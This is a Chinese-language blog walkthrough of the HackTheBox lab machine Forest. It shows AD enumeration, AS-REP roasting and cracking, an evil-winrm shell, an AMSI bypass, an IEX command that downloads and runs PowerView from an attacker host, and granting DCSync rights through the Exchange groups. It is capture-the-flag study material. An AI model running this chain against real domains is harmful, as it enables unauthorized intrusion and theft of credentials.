HackTheBox-Forest | ssooking's notebook

hackthebox- Froest （考点：Kerberos pre-authentication/win-rm&5985/域渗透）

https://blog.csdn.net/weixin_45527786/article/details/105558478

扫描

# nmap -T4 -sS -sV -sC 10.10.10.161
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-04 02:15 EST
Nmap scan report for 10.10.10.161
Host is up (0.28s latency).
Not shown: 989 closed ports
PORT     STATE SERVICE      VERSION
53/tcp   open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-03-04 07:23:52Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=3/4%Time=5E5F559D%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h48m17s, deviation: 4h37m10s, median: 8m15s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2020-03-03T23:26:20-08:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-03-04T07:26:18
|_  start_date: 2020-03-04T05:20:04

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 299.81 seconds

看到139、445端口开启，说明Samba服务在运行。于是使用enum4linux尝试枚举主机用户。

$ enum4linux -S -U 10.10.10.161
...
...
 =========================================== 
|    Getting domain SID for 10.10.10.161    |
 =========================================== 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359.
Domain Name: HTB
Domain Sid: S-1-5-21-3072663084-364016917-1341370565
[+] Host is part of a domain (not a workgroup)
...
...
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]

可以看到域的名字为HTB。我们过滤出主机的用户名字典。

$ enum4linux -U 10.10.10.161 | tee enum4linux.txt
$ cat enum4linux.txt | grep "user:" | awk '{split($0,a,"[" ); print a[2]}' | awk '{split($0,b,"]" ); print b[1]}' > userlist.txt


cat users.txt | awk -F ":" '{print $5}' | awk -F " " '{print $1}' > userlist.txt

错误
# https://markitzeroday.com/pci/active-directory/kerberoast/firewall/2019/04/24/gaining-access-to-card-data-using-the-windows-domain-to-bypass-firewalls.html
$ enum4linux -R 1000-50000 10.0.12.100 |tee enum4linux.txt
$ cat enum4linux.txt | grep '(Local User)' |awk '$2 ~ /MACFARLANE\\/ {print $2}'| grep -vP '^.*?\$$' | sed 's/MACFARLANE\\//g'

通过GetNPUsers.py找其中用户列表中不需要Kerberos预身份验证的用户，发现用户svc-alfresco并获得其hash。不加-format参数默认生成的是hashcat格式的。

$ python GetNPUsers.py HTB/ -usersfile /root/userlist.txt -format john -dc-ip 10.10.10.161
...
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$svc-alfresco@HTB:32d83ad3aeac3898ec4fe24764a37f79$33a0e1816aa4bef47b40636df342ebd304358a005bb31deac95f8416e8ff635bdfe2a0a0c1917fe0940665cd1c0086f314b5bbe72e5a4d27d6490d08ba5681b26259877978107facdb7d55a499883bc0e814be1efdc244d34bb26d01e2c6079c104ecc4ddbb3f821fc995881cc520523bcf3a1f4e6f265058a336f93d3790a640b54ccf29ab6e4bb407c8941e245821795b2d4ff3a07d7f57e4ae440fed0878e5740f234d6f0917fab497c54c7cf0673b8909d1c9610d4696a446ae08041471a36fe94366ffa6e2d2bb9bf27b71ecd96622eafaf79ef93788cd175ce0c2458e0
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ak47 doesn't have UF_DONT_REQUIRE_PREAUTH set

把hash保存成hash.txt

$krb5asrep$svc-alfresco@HTB:32d83ad3aeac3898ec4fe24764a37f79$33a0e1816aa4bef47b40636df342ebd304358a005bb31deac95f8416e8ff635bdfe2a0a0c1917fe0940665cd1c0086f314b5bbe72e5a4d27d6490d08ba5681b26259877978107facdb7d55a499883bc0e814be1efdc244d34bb26d01e2c6079c104ecc4ddbb3f821fc995881cc520523bcf3a1f4e6f265058a336f93d3790a640b54ccf29ab6e4bb407c8941e245821795b2d4ff3a07d7f57e4ae440fed0878e5740f234d6f0917fab497c54c7cf0673b8909d1c9610d4696a446ae08041471a36fe94366ffa6e2d2bb9bf27b71ecd96622eafaf79ef93788cd175ce0c2458e0

使用john解密，加载rockyou.txt字典。

root@localhost:~# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Press 'q' or Ctrl-C to abort, almost any other key for status
s3rvice          ($krb5asrep$svc-alfresco@HTB)
1g 0:00:00:11 DONE (2020-03-04 04:17) 0.08650g/s 353435p/s 353435c/s 353435C/s s3s1k2..s3rj12
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@localhost:~# john --show hash.txt 
$krb5asrep$svc-alfresco@HTB:s3rvice

1 password hash cracked, 0 left

hashcat破解：

https://forum.hackthebox.eu/discussion/2749/getnpusers-py-explained-video

https://markitzeroday.com/pci/active-directory/kerberoast/firewall/2019/04/24/gaining-access-to-card-data-using-the-windows-domain-to-bypass-firewalls.html

然后使用Crackmapexec执行命令。

evil-winrm

https://vulners.com/kitploit/KITPLOIT:1521717899068290187

sudo gem install winrm winrm-fs colorize stringio
sudo gem install evil-winrm

git clone https://github.com/Hackplayers/evil-winrm.git
cd evil-winrm
ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'

使用evil-winrm连接主机

$ evil-winrm -i 192.168.1.100 -u <Username> -p <Password> -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'

$ evil-winrm -i 10.10.10.161 -u svc-alfresco -p "s3rvice"
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> whoami
htb\svc-alfresco
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> type user.txt
e5e4e47ae7022664cda6eb013fb0d9ed
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop>

查询域中的工作组

Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net group /domain

Group Accounts for \\

-------------------------------------------------------------------------------
*$D31000-NSEL5BRJ63V7
*Cloneable Domain Controllers
*Compliance Management
*Delegated Setup
*Discovery Management
*DnsUpdateProxy
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Key Admins
*Enterprise Read-only Domain Controllers
*Exchange Servers
*Exchange Trusted Subsystem
*Exchange Windows Permissions
*ExchangeLegacyInterop
*Group Policy Creator Owners
*Help Desk
*Hygiene Management
*Key Admins
*Managed Availability Servers
*Organization Management
*Privileged IT Accounts
*Protected Users
*Public Folder Management
*Read-only Domain Controllers
*Recipient Management
*Records Management
*Schema Admins
*Security Administrator
*Security Reader
*Server Management
*Service Accounts
*test
*UM Management
*View-Only Organization Management
The command completed with one or more errors.

查看组信息时发现Exchange，尝试通过Exchange的默认高权限提权。

参考：https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/

或者直接搜索CVE-2018-8581

开始提权
可以直接用svc-alfresco这个用户进行一系列给权限操作。
不过我为了更好体验这些不同组的权限分工，来更熟悉域环境。我自己弄个新小弟用户走全程。我先自己增一个用户pkp，密码pkp666！，再加到域的exchange组里。bypass用来绕过我传powerview进来的限制。有了powerview的帮助我才能给自己加dscync的权限

Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net user pkp pkp666! /add /domain
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net group "Exchange Windows Permissions" pkp /add
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net localgroup "Remote Management Users" pkp /add
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> menu

   ,.   (   .      )               "            ,.   (   .      )       .   
  ("  (  )  )'     ,'             (`     '`    ("     )  )'     ,'   .  ,)  
.; )  ' (( (" )    ;(,      .     ;)  "  )"  .; )  ' (( (" )   );(,   )((   
_".,_,.__).,) (.._( ._),     )  , (._..( '.._"._, . '._)_(..,_(_".) _( _')  
\_   _____/__  _|__|  |    ((  (  /  \    /  \__| ____\______   \  /     \  
 |    __)_\  \/ /  |  |    ;_)_') \   \/\/   /  |/    \|       _/ /  \ /  \ 
 |        \\   /|  |  |__ /_____/  \        /|  |   |  \    |   \/    Y    \
/_______  / \_/ |__|____/           \__/\  / |__|___|  /____|_  /\____|__  /
        \/                               \/          \/       \/         \/ 
              By: CyberVaca, OscarAkaElvis, Laox @Hackplayers  
 
[+] Bypass-4MSI 
[+] Dll-Loader 
[+] Donut-Loader 
[+] Invoke-Binary

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Bypass-4MSI
[+] Patched! :D

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> IEX(New-Object Net.Webclient).downloadString('http://10.10.14.3/PowerView.ps1')
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $pass = convertto-securestring 'pkp666!' -asplain -force
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $cred = new-object system.management.automation.pscredential('htb\pkp', $pass)
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Add-ObjectACL -PrincipalIdentity pkp -Credential $cred -Rights DCSync

https://yaboygmoney.github.io/htb/forest.html

https://mp.weixin.qq.com/s/VrRCxszh03ffAq531XNyKg

https://markitzeroday.com/pci/active-directory/kerberoast/firewall/2019/04/24/gaining-access-to-card-data-using-the-windows-domain-to-bypass-firewalls.html